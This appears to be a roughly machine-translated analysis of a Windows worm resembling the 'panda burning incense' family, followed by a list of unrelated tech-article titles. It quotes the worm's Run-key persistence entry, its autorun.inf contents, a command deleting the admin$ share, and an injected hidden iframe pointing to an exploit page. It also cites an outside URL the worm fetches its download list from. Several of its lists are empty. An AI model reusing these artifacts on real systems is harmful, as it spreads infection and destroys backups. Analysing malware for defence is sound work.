Five, technical analysis
1: After the virus file is running, copy itself to %SystemRoot%\\system32\\drivers\ vscv32.exe< Br>
Create a registry self-starting item:
[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\]
nvscv32: "C:\\Windows\\system32\\drivers\\ Nvscv32.exe"
2: Find anti-virus form virus end related process:
3: End the following process
4: Disable the following services
5: Delete the following registry key:
6: Infect all executable files and change the icon to (this time it’s not the panda burning incense Icon)
7: Skip the following directory:
8: Delete the *.gho backup file.
9: Create a copy of the file. setup.exe in all the root directories of the drive, create an autorun.inf file to make the virus run automatically, and set the file attributes to hidden, read-only, and system.
autorun.inf content:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\\Auto\\command=setup.exe
10: Delete share: cmd.exe /c net share admin$ /del /y
11: Add <iframe src=http://www.krvkr.com/to all script files on the machine Worm.htm width=”0” height=”0”></iframe>, this code address is a web page trojan that exploits the MS-06014 vulnerability, once the user browses the web page on the server in the virus, if the system If you don't patch it, you will download and execute this virus.
12: Scan LAN machines, and once they find a vulnerability, they will spread quickly.
13: Visit http://www in the background. Whboy. Net/update/wormcn. Txt, download other viruses according to the download list.
The current download list is as follows: (The following links are all dangerous content, please do not click!)
To this virus behavior The analysis is complete.
Many people like to put some shortcuts on the desktop for convenience. It is convenient to u
Introduction As more and more homes and small businesses add computers, they will find the network
First, find the logonui.exe file in your computer, usually in the c:\\Windows\\system32 directory, c
. Dell previously announced a $20-50 plan to downgrade from Windows Vista to XP. Now this plan may b
The strongest in history? From 0 to 33600 Logical port details (3)
Windows 2000/XP User Switching Method
XP: 23 strokes to create the fastest WinXP
See how the master teaches you how to change the IP address using the command line.
Adding the search path of the executable file
Improve the speed of Windows XP with software
Time synchronization in WinXP SP2
Apple mac system to install windows7 system detailed tutorial
How to close the Win8 virus protection program?
Partition Assistant Loss Partitioning Tutorial
When will Win9 be released? Microsoft's next generation Win9 intelligence summary
How does Win7 reduce CPU usage?
Win8 system storm voice can not run the solution
Microsoft improves the Win10 home features to make it safer for children to use the computer